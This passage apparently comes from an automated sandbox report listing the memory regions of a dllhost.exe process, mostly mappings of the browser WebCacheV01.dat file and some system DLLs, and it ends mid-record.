"\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 688 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 689 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 690 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 691 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 692 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 693 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 694 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 695 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 696 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 697 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 698 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 699 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 700 start_va = 0x5e0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 701 start_va = 0x6e0000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 702 start_va = 0x7e0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 703 start_va = 0x7f0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 704 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 705 start_va = 0x810000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 706 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 707 start_va = 0x830000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 708 start_va = 0x840000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 709 start_va = 0x850000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 710 start_va = 0x860000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 711 start_va = 0x870000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 712 start_va = 0x880000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 713 start_va = 0x890000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 714 start_va = 0x8a0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 715 start_va = 0x8b0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 716 start_va = 0x8c0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 717 start_va = 0x8d0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 718 start_va = 0x8e0000 end_va = 0x8effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 719 start_va = 0x8f0000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 720 start_va = 0x900000 end_va = 0x90ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 721 start_va = 0x910000 end_va = 0x91ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 722 start_va = 0x920000 end_va = 0x927fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 723 start_va = 0x930000 end_va = 0x93ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 724 start_va = 0x940000 end_va = 0x94ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 725 start_va = 0x950000 end_va = 0x95ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 726 start_va = 0x970000 end_va = 0x97ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 727 start_va = 0x9f0000 end_va = 0xaeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 728 start_va = 0xaf0000 end_va = 0xc77fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000af0000" filename = "" Region: id = 729 start_va = 0xc80000 end_va = 0xe00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c80000" filename = "" Region: id = 730 start_va = 0xe10000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e10000" filename = "" Region: id = 731 start_va = 0x2210000 end_va = 0x230ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 732 start_va = 0x2310000 end_va = 0x231ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002310000" filename = "" Region: id = 733 start_va = 0x2320000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002320000" filename = "" Region: id = 734 start_va = 0x2330000 end_va = 0x233ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002330000" filename = "" Region: id = 735 start_va = 0x2340000 end_va = 0x234ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002340000" filename = "" Region: id = 736 start_va = 0x2350000 end_va = 0x235ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002350000" filename = "" Region: id = 737 start_va = 0x2360000 end_va = 0x236ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002360000" filename = "" Region: id = 738 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 739 start_va = 0x2380000 end_va = 0x238ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002380000" filename = "" Region: id = 740 start_va = 0x2390000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002390000" filename = "" Region: id = 741 start_va = 0x23a0000 end_va = 0x23affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023a0000" filename = "" Region: id = 742 start_va = 0x23b0000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023b0000" filename = "" Region: id = 743 start_va = 0x23c0000 end_va = 0x23cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023c0000" filename = "" Region: id = 744 start_va = 0x23d0000 end_va = 0x23d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 745 start_va = 0x23e0000 end_va = 0x23e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 746 start_va = 0x23f0000 end_va = 0x23f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 747 start_va = 0x2400000 end_va = 0x240ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 748 start_va = 0x2410000 end_va = 0x250ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 749 start_va = 0x2510000 end_va = 0x2846fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 750 start_va = 0x2850000 end_va = 0x384ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 751 start_va = 0x3850000 end_va = 0x38dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003850000" filename = "" Region: id = 752 start_va = 0x38e0000 end_va = 0x38e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038e0000" filename = "" Region: id = 753 start_va = 0x38f0000 end_va = 0x38f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038f0000" filename = "" Region: id = 754 start_va = 0x3920000 end_va = 0x392ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 755 start_va = 0x3950000 end_va = 0x395ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 756 start_va = 0x3960000 end_va = 0x396ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 757 start_va = 0x3970000 end_va = 0x397ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 758 start_va = 0x3980000 end_va = 0x398ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 759 start_va = 0x3990000 end_va = 0x399ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 760 start_va = 0x39d0000 end_va = 0x39dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 761 start_va = 0x39e0000 end_va = 0x39effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 762 start_va = 0x3a00000 end_va = 0x3a07fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 763 start_va = 0x3a10000 end_va = 0x3a1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 764 start_va = 0x3a30000 end_va = 0x3a3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 765 start_va = 0x3a40000 end_va = 0x3a4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 766 start_va = 0x3a50000 end_va = 0x3a57fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a50000" filename = "" Region: id = 767 start_va = 0x3a60000 end_va = 0x3a6ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 768 start_va = 0x3a80000 end_va = 0x3a8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a80000" filename = "" Region: id = 769 start_va = 0x3b00000 end_va = 0x3b0ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 770 start_va = 0x3b10000 end_va = 0x3b1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b10000" filename = "" Region: id = 771 start_va = 0x3b20000 end_va = 0x3b2ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 772 start_va = 0x3b30000 end_va = 0x3b3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 773 start_va = 0x3b40000 end_va = 0x3b4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 774 start_va = 0x3b50000 end_va = 0x3c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b50000" filename = "" Region: id = 775 start_va = 0x3c50000 end_va = 0x3c5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c50000" filename = "" Region: id = 776 start_va = 0x3c60000 end_va = 0x3c6ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 777 start_va = 0x3c70000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 778 start_va = 0x3c80000 end_va = 0x3d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c80000" filename = "" Region: id = 779 start_va = 0x3d80000 end_va = 0x3e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d80000" filename = "" Region: id = 780 start_va = 0x3e80000 end_va = 0x3f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e80000" filename = "" Region: id = 781 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 782 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 783 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 784 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 785 start_va = 0x7ff708450000 end_va = 0x7ff708456fff monitored = 0 entry_point = 0x7ff708451570 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 786 start_va = 0x7ffb19830000 end_va = 0x7ffb19844fff monitored = 0 entry_point = 0x7ffb19835740 region_type = mapped_file name = "profext.dll" filename = "\\Windows\\System32\\profext.dll" (normalized: "c:\\windows\\system32\\profext.dll") Region: id = 787 start_va = 0x7ffb1c1c0000 end_va = 0x7ffb1c44dfff monitored = 0 entry_point = 0x7ffb1c290f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 788 start_va = 0x7ffb1cd50000 end_va = 0x7ffb1d048fff monitored = 0 entry_point = 0x7ffb1ce17280 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 789 start_va = 0x7ffb23930000 end_va = 0x7ffb23cb1fff monitored = 0 entry_point = 0x7ffb23981220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 790 start_va = 0x7ffb28160000 end_va = 0x7ffb281f5fff monitored = 0 entry_point = 0x7ffb28185570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 791 start_va = 0x7ffb28cd0000 end_va = 0x7ffb28d00fff monitored = 0 entry_point = 0x7ffb28cd7d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 792 start_va = 0x7ffb28f40000 end_va = 0x7ffb28f5efff monitored = 0 entry_point = 0x7ffb28f45d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 793 start_va = 0x7ffb29280000 end_va = 0x7ffb2928afff monitored = 0 entry_point = 0x7ffb292819a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 794 start_va = 0x7ffb29670000 end_va = 0x7ffb29698fff monitored = 0 entry_point = 0x7ffb29684530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 795 start_va = 0x7ffb297e0000 end_va = 0x7ffb2982afff monitored = 0 entry_point = 0x7ffb297e35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 796 start_va = 0x7ffb29830000 end_va = 0x7ffb2983efff monitored = 0 entry_point = 0x7ffb29833210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 797 start_va = 0x7ffb29850000 end_va = 0x7ffb29863fff monitored = 0 entry_point = 0x7ffb298552e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 798 start_va = 0x7ffb29b30000 end_va = 0x7ffb29b99fff 